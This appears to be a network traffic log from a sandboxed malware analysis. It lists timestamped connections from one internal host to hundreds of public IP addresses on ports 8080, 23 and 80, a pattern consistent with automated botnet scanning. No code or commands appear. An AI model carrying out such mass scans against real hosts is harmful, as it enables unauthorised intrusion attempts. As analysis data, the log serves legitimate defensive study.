                                                            Feb 14, 2024 09:27:45.282113075 CET406848080192.168.2.2362.23.116.131
                                                            Feb 14, 2024 09:27:45.282119036 CET406848080192.168.2.2331.154.56.146
                                                            Feb 14, 2024 09:27:45.282121897 CET406848080192.168.2.2362.87.42.203
                                                            Feb 14, 2024 09:27:45.282121897 CET406848080192.168.2.2331.165.124.89
                                                            Feb 14, 2024 09:27:45.282124043 CET406848080192.168.2.2331.32.160.5
                                                            Feb 14, 2024 09:27:45.282124043 CET406848080192.168.2.2394.37.127.219
                                                            Feb 14, 2024 09:27:45.282124996 CET406848080192.168.2.2362.217.153.27
                                                            Feb 14, 2024 09:27:45.282135963 CET406848080192.168.2.2331.206.202.155
                                                            Feb 14, 2024 09:27:45.282140970 CET406848080192.168.2.2331.5.186.31
                                                            Feb 14, 2024 09:27:45.282144070 CET406848080192.168.2.2385.6.221.26
                                                            Feb 14, 2024 09:27:45.282149076 CET406848080192.168.2.2362.105.67.242
                                                            Feb 14, 2024 09:27:45.282150984 CET406848080192.168.2.2331.29.9.204
                                                            Feb 14, 2024 09:27:45.282150984 CET406848080192.168.2.2385.162.111.106
                                                            Feb 14, 2024 09:27:45.282156944 CET406848080192.168.2.2395.247.125.221
                                                            Feb 14, 2024 09:27:45.282157898 CET406848080192.168.2.2362.167.23.188
                                                            Feb 14, 2024 09:27:45.282159090 CET406848080192.168.2.2362.202.95.113
                                                            Feb 14, 2024 09:27:45.282159090 CET406848080192.168.2.2331.36.147.114
                                                            Feb 14, 2024 09:27:45.282159090 CET406848080192.168.2.2362.117.135.176
                                                            Feb 14, 2024 09:27:45.282167912 CET406848080192.168.2.2394.227.6.117
                                                            Feb 14, 2024 09:27:45.282167912 CET406848080192.168.2.2395.193.105.239
                                                            Feb 14, 2024 09:27:45.282181978 CET406848080192.168.2.2395.13.250.30
                                                            Feb 14, 2024 09:27:45.282182932 CET406848080192.168.2.2331.132.24.188
                                                            Feb 14, 2024 09:27:45.282186985 CET406848080192.168.2.2395.173.116.77
                                                            Feb 14, 2024 09:27:45.282186985 CET406848080192.168.2.2362.79.39.202
                                                            Feb 14, 2024 09:27:45.282191038 CET406848080192.168.2.2362.114.245.208
                                                            Feb 14, 2024 09:27:45.282196045 CET406848080192.168.2.2362.129.42.153
                                                            Feb 14, 2024 09:27:45.282196045 CET406848080192.168.2.2385.15.95.18
                                                            Feb 14, 2024 09:27:45.282202959 CET406848080192.168.2.2385.138.211.182
                                                            Feb 14, 2024 09:27:45.282202959 CET406848080192.168.2.2331.172.20.17
                                                            Feb 14, 2024 09:27:45.282217979 CET406848080192.168.2.2331.130.44.136
                                                            Feb 14, 2024 09:27:45.282222986 CET406848080192.168.2.2362.120.25.22
                                                            Feb 14, 2024 09:27:45.282227039 CET406848080192.168.2.2394.88.218.94
                                                            Feb 14, 2024 09:27:45.282227993 CET406848080192.168.2.2394.204.124.91
                                                            Feb 14, 2024 09:27:45.282227993 CET406848080192.168.2.2331.24.169.227
                                                            Feb 14, 2024 09:27:45.282231092 CET406848080192.168.2.2394.105.137.25
                                                            Feb 14, 2024 09:27:45.282234907 CET406848080192.168.2.2362.169.211.162
                                                            Feb 14, 2024 09:27:45.282234907 CET406848080192.168.2.2385.186.209.229
                                                            Feb 14, 2024 09:27:45.282239914 CET406848080192.168.2.2331.163.98.99
                                                            Feb 14, 2024 09:27:45.282243967 CET406848080192.168.2.2385.250.234.91
                                                            Feb 14, 2024 09:27:45.282243967 CET406848080192.168.2.2331.245.71.182
                                                            Feb 14, 2024 09:27:45.282258034 CET406848080192.168.2.2331.60.23.31
                                                            Feb 14, 2024 09:27:45.282258987 CET406848080192.168.2.2385.148.70.36
                                                            Feb 14, 2024 09:27:45.282258987 CET406848080192.168.2.2395.135.42.58
                                                            Feb 14, 2024 09:27:45.282274008 CET406848080192.168.2.2385.8.206.129
                                                            Feb 14, 2024 09:27:45.282279015 CET406848080192.168.2.2394.243.178.142
                                                            Feb 14, 2024 09:27:45.282279015 CET406848080192.168.2.2395.8.144.72
                                                            Feb 14, 2024 09:27:45.282282114 CET406848080192.168.2.2385.118.211.118
                                                            Feb 14, 2024 09:27:45.282284975 CET406848080192.168.2.2362.97.170.240
                                                            Feb 14, 2024 09:27:45.282284975 CET406848080192.168.2.2362.22.249.222
                                                            Feb 14, 2024 09:27:45.282298088 CET406848080192.168.2.2331.109.210.69
                                                            Feb 14, 2024 09:27:45.282300949 CET406848080192.168.2.2395.227.219.64
                                                            Feb 14, 2024 09:27:45.282300949 CET406848080192.168.2.2385.180.24.38
                                                            Feb 14, 2024 09:27:45.282315016 CET406848080192.168.2.2362.69.116.181
                                                            Feb 14, 2024 09:27:45.282315016 CET406848080192.168.2.2362.83.248.91
                                                            Feb 14, 2024 09:27:45.282319069 CET406848080192.168.2.2395.101.30.195
                                                            Feb 14, 2024 09:27:45.282326937 CET406848080192.168.2.2331.174.76.129
                                                            Feb 14, 2024 09:27:45.282329082 CET406848080192.168.2.2385.157.253.131
                                                            Feb 14, 2024 09:27:45.282339096 CET406848080192.168.2.2395.167.160.216
                                                            Feb 14, 2024 09:27:45.282341957 CET406848080192.168.2.2362.57.213.81
                                                            Feb 14, 2024 09:27:45.282352924 CET406848080192.168.2.2395.233.4.82
                                                            Feb 14, 2024 09:27:45.282356977 CET406848080192.168.2.2394.189.30.37
                                                            Feb 14, 2024 09:27:45.282356977 CET406848080192.168.2.2394.249.68.226
                                                            Feb 14, 2024 09:27:45.282365084 CET406848080192.168.2.2385.162.135.60
                                                            Feb 14, 2024 09:27:45.282375097 CET406848080192.168.2.2385.44.136.240
                                                            Feb 14, 2024 09:27:45.282376051 CET406848080192.168.2.2394.105.232.31
                                                            Feb 14, 2024 09:27:45.282388926 CET406848080192.168.2.2331.3.40.76
                                                            Feb 14, 2024 09:27:45.282388926 CET406848080192.168.2.2394.131.50.210
                                                            Feb 14, 2024 09:27:45.282388926 CET406848080192.168.2.2395.132.243.23
                                                            Feb 14, 2024 09:27:45.282390118 CET406848080192.168.2.2362.228.146.100
                                                            Feb 14, 2024 09:27:45.282393932 CET406848080192.168.2.2394.32.111.80
                                                            Feb 14, 2024 09:27:45.282402992 CET406848080192.168.2.2385.41.123.163
                                                            Feb 14, 2024 09:27:45.282403946 CET406848080192.168.2.2385.248.123.39
                                                            Feb 14, 2024 09:27:45.282413960 CET406848080192.168.2.2362.109.190.99
                                                            Feb 14, 2024 09:27:45.282421112 CET406848080192.168.2.2331.135.212.42
                                                            Feb 14, 2024 09:27:45.282434940 CET406848080192.168.2.2385.140.154.187
                                                            Feb 14, 2024 09:27:45.282439947 CET406848080192.168.2.2394.37.222.193
                                                            Feb 14, 2024 09:27:45.282444000 CET406848080192.168.2.2362.86.86.3
                                                            Feb 14, 2024 09:27:45.282444000 CET406848080192.168.2.2331.77.78.225
                                                            Feb 14, 2024 09:27:45.282447100 CET406848080192.168.2.2331.150.68.204
                                                            Feb 14, 2024 09:27:45.282447100 CET406848080192.168.2.2394.58.67.224
                                                            Feb 14, 2024 09:27:45.282447100 CET406848080192.168.2.2395.7.36.17
                                                            Feb 14, 2024 09:27:45.282447100 CET406848080192.168.2.2395.85.119.227
                                                            Feb 14, 2024 09:27:45.282461882 CET406848080192.168.2.2394.53.224.73
                                                            Feb 14, 2024 09:27:45.282461882 CET406848080192.168.2.2395.80.94.51
                                                            Feb 14, 2024 09:27:45.282461882 CET406848080192.168.2.2362.53.83.29
                                                            Feb 14, 2024 09:27:45.282474995 CET406848080192.168.2.2362.97.4.106
                                                            Feb 14, 2024 09:27:45.282475948 CET406848080192.168.2.2362.162.10.153
                                                            Feb 14, 2024 09:27:45.282474995 CET406848080192.168.2.2394.190.173.249
                                                            Feb 14, 2024 09:27:45.282496929 CET406848080192.168.2.2395.213.29.233
                                                            Feb 14, 2024 09:27:45.282502890 CET406848080192.168.2.2331.81.247.107
                                                            Feb 14, 2024 09:27:45.282520056 CET406848080192.168.2.2394.241.21.22
                                                            Feb 14, 2024 09:27:45.282520056 CET406848080192.168.2.2362.230.138.243
                                                            Feb 14, 2024 09:27:45.282522917 CET406848080192.168.2.2385.225.165.186
                                                            Feb 14, 2024 09:27:45.282525063 CET406848080192.168.2.2395.87.218.105
                                                            Feb 14, 2024 09:27:45.282535076 CET406848080192.168.2.2395.24.10.107
                                                            Feb 14, 2024 09:27:45.282535076 CET406848080192.168.2.2395.113.77.253
                                                            Feb 14, 2024 09:27:45.282538891 CET406848080192.168.2.2394.225.138.136
                                                            Feb 14, 2024 09:27:45.282546043 CET406848080192.168.2.2394.236.207.235
                                                            Feb 14, 2024 09:27:45.282550097 CET406848080192.168.2.2331.221.204.138
                                                            Feb 14, 2024 09:27:45.282558918 CET406848080192.168.2.2362.60.236.120
                                                            Feb 14, 2024 09:27:45.282562971 CET406848080192.168.2.2385.230.233.71
                                                            Feb 14, 2024 09:27:45.282573938 CET406848080192.168.2.2331.241.144.80
                                                            Feb 14, 2024 09:27:45.282573938 CET406848080192.168.2.2395.1.57.41
                                                            Feb 14, 2024 09:27:45.282574892 CET406848080192.168.2.2362.130.154.38
                                                            Feb 14, 2024 09:27:45.282574892 CET406848080192.168.2.2362.241.200.107
                                                            Feb 14, 2024 09:27:45.282574892 CET406848080192.168.2.2394.120.165.56
                                                            Feb 14, 2024 09:27:45.282577038 CET406848080192.168.2.2385.162.62.66
                                                            Feb 14, 2024 09:27:45.282587051 CET406848080192.168.2.2385.235.174.81
                                                            Feb 14, 2024 09:27:45.282593966 CET406848080192.168.2.2394.194.84.141
                                                            Feb 14, 2024 09:27:45.282597065 CET406848080192.168.2.2395.30.232.48
                                                            Feb 14, 2024 09:27:45.282609940 CET406848080192.168.2.2394.3.184.185
                                                            Feb 14, 2024 09:27:45.282609940 CET406848080192.168.2.2395.161.149.107
                                                            Feb 14, 2024 09:27:45.282612085 CET406848080192.168.2.2331.126.111.183
                                                            Feb 14, 2024 09:27:45.282624960 CET406848080192.168.2.2362.86.75.125
                                                            Feb 14, 2024 09:27:45.282624960 CET406848080192.168.2.2395.10.8.145
                                                            Feb 14, 2024 09:27:45.282624960 CET406848080192.168.2.2331.23.176.208
                                                            Feb 14, 2024 09:27:45.282628059 CET406848080192.168.2.2395.76.218.211
                                                            Feb 14, 2024 09:27:45.282629967 CET406848080192.168.2.2385.249.47.191
                                                            Feb 14, 2024 09:27:45.282630920 CET406848080192.168.2.2385.252.43.117
                                                            Feb 14, 2024 09:27:45.282630920 CET406848080192.168.2.2395.136.148.21
                                                            Feb 14, 2024 09:27:45.282659054 CET406848080192.168.2.2362.206.87.96
                                                            Feb 14, 2024 09:27:45.282660007 CET406848080192.168.2.2385.157.51.215
                                                            Feb 14, 2024 09:27:45.282660007 CET406848080192.168.2.2395.226.18.255
                                                            Feb 14, 2024 09:27:45.282660007 CET406848080192.168.2.2395.123.59.89
                                                            Feb 14, 2024 09:27:45.282660007 CET406848080192.168.2.2385.214.82.230
                                                            Feb 14, 2024 09:27:45.282660007 CET406848080192.168.2.2362.167.63.203
                                                            Feb 14, 2024 09:27:45.282670021 CET406848080192.168.2.2385.251.115.80
                                                            Feb 14, 2024 09:27:45.282685041 CET406848080192.168.2.2385.150.212.253
                                                            Feb 14, 2024 09:27:45.282687902 CET406848080192.168.2.2395.143.226.206
                                                            Feb 14, 2024 09:27:45.282690048 CET406848080192.168.2.2395.252.120.106
                                                            Feb 14, 2024 09:27:45.282696009 CET406848080192.168.2.2385.16.4.146
                                                            Feb 14, 2024 09:27:45.282696962 CET406848080192.168.2.2331.148.101.65
                                                            Feb 14, 2024 09:27:45.282696962 CET406848080192.168.2.2331.24.143.220
                                                            Feb 14, 2024 09:27:45.282699108 CET406848080192.168.2.2362.253.234.10
                                                            Feb 14, 2024 09:27:45.282700062 CET406848080192.168.2.2385.11.247.76
                                                            Feb 14, 2024 09:27:45.282700062 CET406848080192.168.2.2385.192.16.192
                                                            Feb 14, 2024 09:27:45.282701969 CET406848080192.168.2.2331.232.135.231
                                                            Feb 14, 2024 09:27:45.282701969 CET406848080192.168.2.2385.253.99.9
                                                            Feb 14, 2024 09:27:45.282715082 CET406848080192.168.2.2331.127.103.91
                                                            Feb 14, 2024 09:27:45.282718897 CET406848080192.168.2.2331.220.72.160
                                                            Feb 14, 2024 09:27:45.282725096 CET406848080192.168.2.2362.199.90.30
                                                            Feb 14, 2024 09:27:45.299093008 CET232340695136.243.143.75192.168.2.23
                                                            Feb 14, 2024 09:27:45.317539930 CET583328080192.168.2.2331.136.47.252
                                                            Feb 14, 2024 09:27:45.374910116 CET232340695175.192.19.146192.168.2.23
                                                            Feb 14, 2024 09:27:45.402563095 CET80804068462.76.146.141192.168.2.23
                                                            Feb 14, 2024 09:27:45.403812885 CET80804068494.103.191.36192.168.2.23
                                                            Feb 14, 2024 09:27:45.404679060 CET80804068495.214.219.96192.168.2.23
                                                            Feb 14, 2024 09:27:45.406418085 CET80804068494.131.50.210192.168.2.23
                                                            Feb 14, 2024 09:27:45.471888065 CET2340695196.67.90.144192.168.2.23
                                                            Feb 14, 2024 09:27:45.475219011 CET80804068485.13.222.99192.168.2.23
                                                            Feb 14, 2024 09:27:45.476963997 CET80804068494.237.122.11192.168.2.23
                                                            Feb 14, 2024 09:27:45.484915972 CET80804068462.23.116.131192.168.2.23
                                                            Feb 14, 2024 09:27:45.486157894 CET80804068462.62.188.134192.168.2.23
                                                            Feb 14, 2024 09:27:45.496053934 CET80804068485.51.105.126192.168.2.23
                                                            Feb 14, 2024 09:27:45.496141911 CET80804068494.130.75.99192.168.2.23
                                                            Feb 14, 2024 09:27:45.500610113 CET80804068485.214.119.175192.168.2.23
                                                            Feb 14, 2024 09:27:45.501116037 CET80804068462.246.158.99192.168.2.23
                                                            Feb 14, 2024 09:27:45.501178980 CET80804068494.81.222.125192.168.2.23
                                                            Feb 14, 2024 09:27:45.501575947 CET80804068462.245.140.94192.168.2.23
                                                            Feb 14, 2024 09:27:45.502413034 CET80804068485.214.195.22192.168.2.23
                                                            Feb 14, 2024 09:27:45.505707979 CET80804068494.134.73.58192.168.2.23
                                                            Feb 14, 2024 09:27:45.508064032 CET80804068485.214.82.230192.168.2.23
                                                            Feb 14, 2024 09:27:45.509421110 CET583508080192.168.2.2331.136.47.252
                                                            Feb 14, 2024 09:27:45.512574911 CET80804068462.174.165.96192.168.2.23
                                                            Feb 14, 2024 09:27:45.513108015 CET80804068495.140.153.8192.168.2.23
                                                            Feb 14, 2024 09:27:45.520457029 CET80804068494.236.207.235192.168.2.23
                                                            Feb 14, 2024 09:27:45.533545017 CET80804068494.34.165.229192.168.2.23
                                                            Feb 14, 2024 09:27:45.551321030 CET80804068494.43.45.6192.168.2.23
                                                            Feb 14, 2024 09:27:45.555233955 CET80804068485.133.216.224192.168.2.23
                                                            Feb 14, 2024 09:27:45.555648088 CET80804068494.43.203.237192.168.2.23
                                                            Feb 14, 2024 09:27:45.565490007 CET80804068495.56.85.138192.168.2.23
                                                            Feb 14, 2024 09:27:45.568855047 CET80804068495.181.17.89192.168.2.23
                                                            Feb 14, 2024 09:27:45.572504044 CET80804068495.181.0.226192.168.2.23
                                                            Feb 14, 2024 09:27:45.611263990 CET80804068494.207.71.210192.168.2.23
                                                            Feb 14, 2024 09:27:45.612092972 CET80804068462.249.140.49192.168.2.23
                                                            Feb 14, 2024 09:27:45.665186882 CET23406952.192.25.46192.168.2.23
                                                            Feb 14, 2024 09:27:45.665361881 CET4069523192.168.2.232.192.25.46
                                                            Feb 14, 2024 09:27:45.692898989 CET4067280192.168.2.2388.235.122.8
                                                            Feb 14, 2024 09:27:45.692899942 CET4067280192.168.2.2388.126.62.90
                                                            Feb 14, 2024 09:27:45.692925930 CET4067280192.168.2.2388.107.16.206
                                                            Feb 14, 2024 09:27:45.692955017 CET4067280192.168.2.2388.38.91.74
                                                            Feb 14, 2024 09:27:45.692985058 CET4067280192.168.2.2388.168.17.231
                                                            Feb 14, 2024 09:27:45.692991972 CET4067280192.168.2.2388.9.197.176
                                                            Feb 14, 2024 09:27:45.693017960 CET4067280192.168.2.2388.203.20.73
                                                            Feb 14, 2024 09:27:45.693037033 CET4067280192.168.2.2388.124.33.246
                                                            Feb 14, 2024 09:27:45.693042994 CET4067280192.168.2.2388.37.183.28
                                                            Feb 14, 2024 09:27:45.693048954 CET4067280192.168.2.2388.77.113.218
                                                            Feb 14, 2024 09:27:45.693059921 CET4067280192.168.2.2388.79.57.129
                                                            Feb 14, 2024 09:27:45.693080902 CET4067280192.168.2.2388.202.34.66
                                                            Feb 14, 2024 09:27:45.693099976 CET4067280192.168.2.2388.18.81.113
                                                            Feb 14, 2024 09:27:45.693110943 CET4067280192.168.2.2388.131.114.92
                                                            Feb 14, 2024 09:27:45.693147898 CET4067280192.168.2.2388.215.43.100
                                                            Feb 14, 2024 09:27:45.693156004 CET4067280192.168.2.2388.151.226.1
                                                            Feb 14, 2024 09:27:45.693170071 CET4067280192.168.2.2388.194.96.22
                                                            Feb 14, 2024 09:27:45.693181038 CET4067280192.168.2.2388.89.216.196
                                                            Feb 14, 2024 09:27:45.693226099 CET4067280192.168.2.2388.2.192.218
                                                            Feb 14, 2024 09:27:45.693229914 CET4067280192.168.2.2388.57.52.57
                                                            Feb 14, 2024 09:27:45.693243027 CET4067280192.168.2.2388.112.106.63
                                                            Feb 14, 2024 09:27:45.693259954 CET4067280192.168.2.2388.92.176.237
                                                            Feb 14, 2024 09:27:45.693305016 CET4067280192.168.2.2388.156.188.134
                                                            Feb 14, 2024 09:27:45.693305969 CET4067280192.168.2.2388.101.139.197
                                                            Feb 14, 2024 09:27:45.693316936 CET4067280192.168.2.2388.240.169.205
                                                            Feb 14, 2024 09:27:45.693362951 CET4067280192.168.2.2388.113.166.47
                                                            Feb 14, 2024 09:27:45.693371058 CET4067280192.168.2.2388.104.231.144
                                                            Feb 14, 2024 09:27:45.693387032 CET4067280192.168.2.2388.127.214.125
                                                            Feb 14, 2024 09:27:45.693408012 CET4067280192.168.2.2388.217.67.146
                                                            Feb 14, 2024 09:27:45.693418026 CET4067280192.168.2.2388.20.111.126
                                                            Feb 14, 2024 09:27:45.693445921 CET4067280192.168.2.2388.165.248.32
                                                            Feb 14, 2024 09:27:45.693459988 CET4067280192.168.2.2388.59.4.91
                                                            Feb 14, 2024 09:27:45.693481922 CET4067280192.168.2.2388.115.69.101
                                                            Feb 14, 2024 09:27:45.693511009 CET4067280192.168.2.2388.236.42.177
                                                            Feb 14, 2024 09:27:45.693511963 CET4067280192.168.2.2388.249.124.207
                                                            Feb 14, 2024 09:27:45.693531990 CET4067280192.168.2.2388.11.37.159
                                                            Feb 14, 2024 09:27:45.693542004 CET4067280192.168.2.2388.189.215.74
                                                            Feb 14, 2024 09:27:45.693566084 CET4067280192.168.2.2388.20.246.197
                                                            Feb 14, 2024 09:27:45.693592072 CET4067280192.168.2.2388.104.65.194
                                                            Feb 14, 2024 09:27:45.693614960 CET4067280192.168.2.2388.4.137.105
                                                            Feb 14, 2024 09:27:45.693627119 CET4067280192.168.2.2388.6.98.0
                                                            Feb 14, 2024 09:27:45.693653107 CET4067280192.168.2.2388.199.5.177
                                                            Feb 14, 2024 09:27:45.693670034 CET4067280192.168.2.2388.3.5.62
                                                            Feb 14, 2024 09:27:45.693670034 CET4067280192.168.2.2388.122.17.91
                                                            Feb 14, 2024 09:27:45.693706989 CET4067280192.168.2.2388.120.103.237
                                                            Feb 14, 2024 09:27:45.693728924 CET4067280192.168.2.2388.184.223.116
                                                            Feb 14, 2024 09:27:45.693744898 CET4067280192.168.2.2388.34.176.162
                                                            Feb 14, 2024 09:27:45.693762064 CET4067280192.168.2.2388.137.164.209
                                                            Feb 14, 2024 09:27:45.693773985 CET4067280192.168.2.2388.1.193.140
                                                            Feb 14, 2024 09:27:45.693819046 CET4067280192.168.2.2388.144.139.181
                                                            Feb 14, 2024 09:27:45.693834066 CET4067280192.168.2.2388.237.187.119
                                                            Feb 14, 2024 09:27:45.693849087 CET4067280192.168.2.2388.188.73.8
                                                            Feb 14, 2024 09:27:45.693896055 CET4067280192.168.2.2388.49.216.80
                                                            Feb 14, 2024 09:27:45.693909883 CET4067280192.168.2.2388.64.122.187
                                                            Feb 14, 2024 09:27:45.693916082 CET4067280192.168.2.2388.133.124.142
                                                            Feb 14, 2024 09:27:45.693931103 CET4067280192.168.2.2388.232.191.124
                                                            Feb 14, 2024 09:27:45.693952084 CET4067280192.168.2.2388.194.234.98
                                                            Feb 14, 2024 09:27:45.693958998 CET4067280192.168.2.2388.208.11.242
                                                            Feb 14, 2024 09:27:45.694014072 CET4067280192.168.2.2388.29.28.198
                                                            Feb 14, 2024 09:27:45.694001913 CET4067280192.168.2.2388.201.146.42
                                                            Feb 14, 2024 09:27:45.694046021 CET4067280192.168.2.2388.153.25.95
                                                            Feb 14, 2024 09:27:45.694048882 CET4067280192.168.2.2388.125.60.117
                                                            Feb 14, 2024 09:27:45.694086075 CET4067280192.168.2.2388.44.152.106
                                                            Feb 14, 2024 09:27:45.694087982 CET4067280192.168.2.2388.29.224.196
                                                            Feb 14, 2024 09:27:45.694103003 CET4067280192.168.2.2388.138.158.111
                                                            Feb 14, 2024 09:27:45.694113016 CET4067280192.168.2.2388.47.198.241
                                                            Feb 14, 2024 09:27:45.694128036 CET4067280192.168.2.2388.73.133.229
                                                            Feb 14, 2024 09:27:45.694186926 CET4067280192.168.2.2388.16.235.86
                                                            Feb 14, 2024 09:27:45.694197893 CET4067280192.168.2.2388.99.172.170
                                                            Feb 14, 2024 09:27:45.694217920 CET4067280192.168.2.2388.134.237.221
                                                            Feb 14, 2024 09:27:45.694252968 CET4067280192.168.2.2388.69.57.221
                                                            Feb 14, 2024 09:27:45.694256067 CET4067280192.168.2.2388.128.117.200
                                                            Feb 14, 2024 09:27:45.694283009 CET4067280192.168.2.2388.192.240.102
                                                            Feb 14, 2024 09:27:45.694286108 CET4067280192.168.2.2388.63.14.115
                                                            Feb 14, 2024 09:27:45.694292068 CET4067280192.168.2.2388.177.108.135
                                                            Feb 14, 2024 09:27:45.694308996 CET4067280192.168.2.2388.8.105.53
                                                            Feb 14, 2024 09:27:45.694343090 CET4067280192.168.2.2388.22.255.89
                                                            Feb 14, 2024 09:27:45.694356918 CET4067280192.168.2.2388.205.132.130
                                                            Feb 14, 2024 09:27:45.694370985 CET4067280192.168.2.2388.223.120.34
                                                            Feb 14, 2024 09:27:45.694381952 CET4067280192.168.2.2388.92.224.117
                                                            Feb 14, 2024 09:27:45.694417000 CET4067280192.168.2.2388.205.123.87
                                                            Feb 14, 2024 09:27:45.694425106 CET4067280192.168.2.2388.228.154.176
                                                            Feb 14, 2024 09:27:45.694443941 CET4067280192.168.2.2388.141.234.210
                                                            Feb 14, 2024 09:27:45.694470882 CET4067280192.168.2.2388.231.105.79
                                                            Feb 14, 2024 09:27:45.694485903 CET4067280192.168.2.2388.118.39.49
                                                            Feb 14, 2024 09:27:45.694500923 CET4067280192.168.2.2388.212.240.134
                                                            Feb 14, 2024 09:27:45.694504976 CET4067280192.168.2.2388.235.246.51
                                                            Feb 14, 2024 09:27:45.694524050 CET4067280192.168.2.2388.101.150.73
                                                            Feb 14, 2024 09:27:45.694525003 CET4067280192.168.2.2388.49.187.223
                                                            Feb 14, 2024 09:27:45.694557905 CET4067280192.168.2.2388.144.87.134
                                                            Feb 14, 2024 09:27:45.694596052 CET4067280192.168.2.2388.66.185.64
                                                            Feb 14, 2024 09:27:45.694607019 CET4067280192.168.2.2388.20.159.40
                                                            Feb 14, 2024 09:27:45.694613934 CET4067280192.168.2.2388.16.176.39
                                                            Feb 14, 2024 09:27:45.694631100 CET4067280192.168.2.2388.20.203.91
                                                            Feb 14, 2024 09:27:45.694648027 CET4067280192.168.2.2388.143.162.229
                                                            Feb 14, 2024 09:27:45.694664955 CET4067280192.168.2.2388.41.223.101
                                                            Feb 14, 2024 09:27:45.694701910 CET4067280192.168.2.2388.103.20.101
                                                            Feb 14, 2024 09:27:45.694701910 CET4067280192.168.2.2388.252.34.48
                                                            Feb 14, 2024 09:27:45.694739103 CET4067280192.168.2.2388.10.32.144
                                                            Feb 14, 2024 09:27:45.694777966 CET4067280192.168.2.2388.132.128.66
                                                            Feb 14, 2024 09:27:45.694793940 CET4067280192.168.2.2388.69.227.44
                                                            Feb 14, 2024 09:27:45.694818020 CET4067280192.168.2.2388.245.210.167
                                                            Feb 14, 2024 09:27:45.694823027 CET4067280192.168.2.2388.248.90.134
                                                            Feb 14, 2024 09:27:45.694844961 CET4067280192.168.2.2388.129.165.52
                                                            Feb 14, 2024 09:27:45.694876909 CET4067280192.168.2.2388.243.100.94
                                                            Feb 14, 2024 09:27:45.694888115 CET4067280192.168.2.2388.241.146.226
                                                            Feb 14, 2024 09:27:45.694899082 CET4067280192.168.2.2388.124.130.235
                                                            Feb 14, 2024 09:27:45.694926023 CET4067280192.168.2.2388.8.113.43
                                                            Feb 14, 2024 09:27:45.694960117 CET4067280192.168.2.2388.159.161.52
                                                            Feb 14, 2024 09:27:45.694971085 CET4067280192.168.2.2388.160.5.10
                                                            Feb 14, 2024 09:27:45.694971085 CET4067280192.168.2.2388.235.242.251
                                                            Feb 14, 2024 09:27:45.694993973 CET4067280192.168.2.2388.251.43.143
                                                            Feb 14, 2024 09:27:45.695007086 CET4067280192.168.2.2388.206.1.77
                                                            Feb 14, 2024 09:27:45.695015907 CET4067280192.168.2.2388.146.150.117
                                                            Feb 14, 2024 09:27:45.695034027 CET4067280192.168.2.2388.100.66.27
                                                            Feb 14, 2024 09:27:45.695046902 CET4067280192.168.2.2388.235.121.95
                                                            Feb 14, 2024 09:27:45.695080996 CET4067280192.168.2.2388.128.236.193
                                                            Feb 14, 2024 09:27:45.695085049 CET4067280192.168.2.2388.135.209.85
                                                            Feb 14, 2024 09:27:45.695113897 CET4067280192.168.2.2388.165.33.45
                                                            Feb 14, 2024 09:27:45.695135117 CET4067280192.168.2.2388.45.175.30
                                                            Feb 14, 2024 09:27:45.695142031 CET4067280192.168.2.2388.75.23.13
                                                            Feb 14, 2024 09:27:45.695164919 CET4067280192.168.2.2388.0.105.12
                                                            Feb 14, 2024 09:27:45.695178986 CET4067280192.168.2.2388.212.37.118
                                                            Feb 14, 2024 09:27:45.695202112 CET4067280192.168.2.2388.58.159.33
                                                            Feb 14, 2024 09:27:45.695219040 CET4067280192.168.2.2388.137.115.103
                                                            Feb 14, 2024 09:27:45.695239067 CET4067280192.168.2.2388.89.28.83
                                                            Feb 14, 2024 09:27:45.695250034 CET4067280192.168.2.2388.71.2.196
                                                            Feb 14, 2024 09:27:45.695274115 CET4067280192.168.2.2388.245.148.134
                                                            Feb 14, 2024 09:27:45.695292950 CET4067280192.168.2.2388.145.193.79
                                                            Feb 14, 2024 09:27:45.695312023 CET4067280192.168.2.2388.20.36.203
                                                            Feb 14, 2024 09:27:45.695326090 CET4067280192.168.2.2388.241.142.100
                                                            Feb 14, 2024 09:27:45.695354939 CET4067280192.168.2.2388.34.133.168
                                                            Feb 14, 2024 09:27:45.695374966 CET4067280192.168.2.2388.132.223.34
                                                            Feb 14, 2024 09:27:45.695394039 CET4067280192.168.2.2388.123.114.143
                                                            Feb 14, 2024 09:27:45.695400953 CET4067280192.168.2.2388.43.121.137
                                                            Feb 14, 2024 09:27:45.695417881 CET4067280192.168.2.2388.30.220.208
                                                            Feb 14, 2024 09:27:45.695437908 CET4067280192.168.2.2388.8.103.159
                                                            Feb 14, 2024 09:27:45.695456028 CET4067280192.168.2.2388.218.206.33
                                                            Feb 14, 2024 09:27:45.695478916 CET4067280192.168.2.2388.69.16.54
                                                            Feb 14, 2024 09:27:45.695489883 CET4067280192.168.2.2388.194.92.253
                                                            Feb 14, 2024 09:27:45.695517063 CET4067280192.168.2.2388.164.90.65
                                                            Feb 14, 2024 09:27:45.695539951 CET4067280192.168.2.2388.145.212.73
                                                            Feb 14, 2024 09:27:45.695566893 CET4067280192.168.2.2388.60.96.13
                                                            Feb 14, 2024 09:27:45.695621014 CET4067280192.168.2.2388.14.199.77
                                                            Feb 14, 2024 09:27:45.695631027 CET4067280192.168.2.2388.233.26.7
                                                            Feb 14, 2024 09:27:45.695631027 CET4067280192.168.2.2388.156.72.10
                                                            Feb 14, 2024 09:27:45.695651054 CET4067280192.168.2.2388.201.85.51
                                                            Feb 14, 2024 09:27:45.695669889 CET4067280192.168.2.2388.74.23.195
                                                            Feb 14, 2024 09:27:45.695698023 CET4067280192.168.2.2388.111.246.134
                                                            Feb 14, 2024 09:27:45.695714951 CET4067280192.168.2.2388.36.74.31
                                                            Feb 14, 2024 09:27:45.695733070 CET4067280192.168.2.2388.65.97.67
                                                            Feb 14, 2024 09:27:45.695760012 CET4067280192.168.2.2388.197.72.84
                                                            Feb 14, 2024 09:27:45.695779085 CET4067280192.168.2.2388.128.81.38
                                                            Feb 14, 2024 09:27:45.695791960 CET4067280192.168.2.2388.187.166.106
                                                            Feb 14, 2024 09:27:45.695811987 CET4067280192.168.2.2388.204.79.185
                                                            Feb 14, 2024 09:27:45.695815086 CET4067280192.168.2.2388.72.164.174
                                                            Feb 14, 2024 09:27:45.695832014 CET4067280192.168.2.2388.189.172.34
                                                            Feb 14, 2024 09:27:45.695839882 CET4067280192.168.2.2388.170.252.80
                                                            Feb 14, 2024 09:27:45.695864916 CET4067280192.168.2.2388.74.156.8
                                                            Feb 14, 2024 09:27:45.695880890 CET4067280192.168.2.2388.176.125.148
                                                            Feb 14, 2024 09:27:45.695930958 CET3729280192.168.2.2395.213.203.34
                                                            Feb 14, 2024 09:27:45.695997000 CET4948080192.168.2.2395.90.14.22
                                                            Feb 14, 2024 09:27:45.696017981 CET5863680192.168.2.2395.101.71.205
